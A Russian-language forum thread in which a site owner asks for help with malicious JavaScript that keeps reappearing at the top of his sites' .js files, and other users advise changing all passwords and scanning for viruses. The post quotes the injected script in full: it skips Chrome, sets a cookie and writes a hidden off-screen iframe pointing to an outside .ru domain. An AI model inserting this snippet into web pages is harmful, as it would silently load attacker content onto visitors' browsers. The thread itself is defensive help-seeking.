Jump to content

Вредоносный код в js файлах


Recommended Posts

Помогите пожалуйста решить проблему!
Почти во всех js файлах в начале добавляется вот такой код. Почистил везде, минут через 10 - 15, снова появляется, причем даты у файлов меняются на более ранние. Выставлял права на файлы 644,  не помогло. Гугл ищет другие сайты с подобным кодом, но уже в html. Может ли это быть проблема хостера?

/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
  return index;
 }
 return false;
}
function zzz_check_ua(){
 var blackList = ['Chrome'];
 var blackUA = false;
 for (var i in blackList) {
  if (stripos(navigator.userAgent, blackList[i])) {
   blackUA = true;
   break;
  }
 }
 return blackUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
 var cookie = getCookie('b1025da77');
 if (cookie == undefined) {
  setCookie('b1025da77', true, 432000);	
  document.write('<iframe height="117" width="117" style="position:absolute;left:-1000px;top:-1000px;" src="http://standarddefinitioncompressed.ru/ge6.rtdgd9?default"></iframe>');
 }
};
})();/*eaa795220*/
Link to post
Share on other sites

пароли поменяйте

сменил, не помогло.

 

по ходу хостер дырявый )))

мастерхост, кстати, проблема расширилась на всю площадку с тремя сайтами, движки везде разные, также еще на одной площадке с тремя сайтами такая же проблема, на других площадках все хорошо.

Link to post
Share on other sites

Glauder

 

Вам нужно поменять пароли на все доступы!

 

FTP, админ часть на хостинге и на сайте, к базе.

 

Все пароли должны быть разными.

 

Проверьте свой комп на вирусы с обновлённой антивирусной базой.

 

Потом удалите лишний код и ждите результата.

Link to post
Share on other sites

Если у ВАс "Поставил 444, минут через 10 опять в файлы добавился левый код, а права стали 644",  то Вы можете легко  проводить эксперименты и пробовать разные возможности.

Скорее всего, у Вас эти вирусы вторичные, а главный в другом месте...

Я тоже так и подумал, прошерстил все файлы, сделал сравнение содержимого с чистыми исходниками симплы, ничего не нашлось.

 

Glauder

 

Вам нужно поменять пароли на все доступы!

 

FTP, админ часть на хостинге и на сайте, к базе.

 

Все пароли должны быть разными.

 

Проверьте свой комп на вирусы с обновлённой антивирусной базой.

 

Потом удалите лишний код и ждите результата.

После смены пароля на ssh и чистки файлов - 12 часов тишина. Пароль не светил, заходил только со своего компа и то очень редко.

 

Всем спасибо за идеи!

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
×
×
  • Create New...